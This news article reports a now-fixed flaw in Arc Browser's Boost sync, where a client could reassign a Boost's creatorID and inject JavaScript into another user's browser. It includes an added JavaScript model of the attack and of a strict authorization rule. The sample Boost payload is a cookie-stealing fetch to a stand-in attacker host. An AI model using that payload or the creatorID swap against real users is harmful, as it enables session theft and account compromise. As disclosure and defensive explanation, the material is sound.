One of the features that differentiates Arc Browser from other browsers is its ability to customize websites. Called “Boost,” the feature lets users change the background color of a website, switch to a preferred or more readable font, or even remove unwanted elements from the page entirely. The changes you make aren’t supposed to be visible to others, but they can be synced across your own devices. Now The Browser Company, the creator of Arc, has acknowledged that a security researcher found a critical flaw that could allow attackers to use Boost to compromise a target’s system.
The company used Firebase, which the security researcher known as “xyzeva” described in the vulnerability write-up as a “database as a backend service,” to support some of Arc’s features. For Boosts in particular, it is used to share and sync customizations across devices. The write-up shows that the browser decides which Boosts to load onto a device by matching the creator’s identifier (creatorID). It also shows that the backend let a client change that field to another user’s ID, assigning a Boost the attacker created to that target.
For example, if a bad actor creates a Boost containing a malicious payload, they can simply change that Boost’s creatorID to the intended target’s ID. Then, when the victim visits the website the Boost targets in Arc, the attacker’s Boost, along with any JavaScript it carries, is applied in the victim’s browser without their knowledge. And as the researcher explained, a user’s ID is very easy to obtain. A user who refers someone to Arc shares their ID with the recipient, and if the account was created from a referral, the referrer also gets the new user’s ID. Users can also share their Boosts with others, and Arc has a page of public Boosts that includes the creator ID of the person who made each one.
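To make the mechanism concrete, here is an added example (not Arc’s or xyzeva’s code, and not the actual Firebase schema) that models a Boost sync store in memory. It shows why a client-writable creatorID field lets an attacker plant a Boost on a victim’s device, and what the server-side authorization rule has to check to stop it. The field names (`creatorID`, `site`, `js`), user IDs and sample documents are constructed for the illustration.

```javascript
// Added example, not code from the original page or from Arc.
// Models a Boost database whose documents are readable and writable by clients,
// the per-device sync query, and two authorization policies: the weak one that
// permits the creatorID swap and a strict one that rejects it.

// Constructed sample data: boostId -> document. Field names are assumed.
function makeStore() {
  return new Map([
    ["b1", { creatorID: "victim-uid",   site: "example.com",  css: "body{font-family:serif}", js: "" }],
    // The attacker's Boost carries a JavaScript payload for a site the victim uses.
    ["b2", { creatorID: "attacker-uid", site: "bank.example", css: "", js: "fetch('https://evil.invalid/?c='+document.cookie)" }],
  ]);
}

// What each device does on sync: pull every Boost whose creatorID equals the
// signed-in user's ID and apply it to matching sites. The field is trusted as-is.
function boostsFor(store, uid) {
  return [...store.values()].filter((b) => b.creatorID === uid);
}

// Weak policy: any signed-in user may update any document and any field.
// This is the class of misconfiguration the write-up describes.
function weakCanUpdate(authUid, existing, incoming) {
  return authUid !== null;
}

// Strict policy: only the owner may update, and creatorID can never change.
// Both conditions are needed; ownership alone still lets the owner re-label
// their own Boost with someone else's ID.
function strictCanUpdate(authUid, existing, incoming) {
  return (
    authUid !== null &&
    existing.creatorID === authUid &&
    incoming.creatorID === existing.creatorID
  );
}

// Apply a partial update under a policy. Returns true if the write went through.
function updateBoost(store, policy, authUid, boostId, patch) {
  const existing = store.get(boostId);
  if (!existing) return false;
  const incoming = { ...existing, ...patch };
  if (!policy(authUid, existing, incoming)) return false;
  store.set(boostId, incoming);
  return true;
}

// The attack: the attacker, signed in as themselves, re-labels their own Boost
// with the victim's ID. Returns whether the write succeeded and which sites the
// victim's device would now customize.
function runAttack(policy) {
  const store = makeStore();
  const applied = updateBoost(store, policy, "attacker-uid", "b2", { creatorID: "victim-uid" });
  const victimSees = boostsFor(store, "victim-uid").map((b) => b.site);
  return { applied, victimSees };
}

// Stand-alone demonstration.
console.log("weak policy:  ", runAttack(weakCanUpdate));
console.log("strict policy:", runAttack(strictCanUpdate));
```

Under the weak policy the attacker’s write succeeds and the victim’s next sync pulls in the Boost for `bank.example`, payload included; under the strict policy the write is rejected and the victim only sees their own Boost. In a Firebase deployment this check would live in the database’s security rules rather than in application code, which is an assumption about how such a fix would be expressed; the page itself reports that the company instead migrated away from Firebase and disabled JavaScript in synced Boosts by default, so the strict rule here is one layer, not the whole fix.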
In a post, The Browser Company said it was notified of the security issue by xyzeva on August 25 and released a fix the next day with the researcher’s help. It also said that no one had exploited the vulnerability and that no users were affected. The company has since implemented several security measures to prevent a recurrence, including migrating away from Firebase, disabling JavaScript by default in synced Boosts, establishing a bug bounty program, and hiring a new senior security engineer.
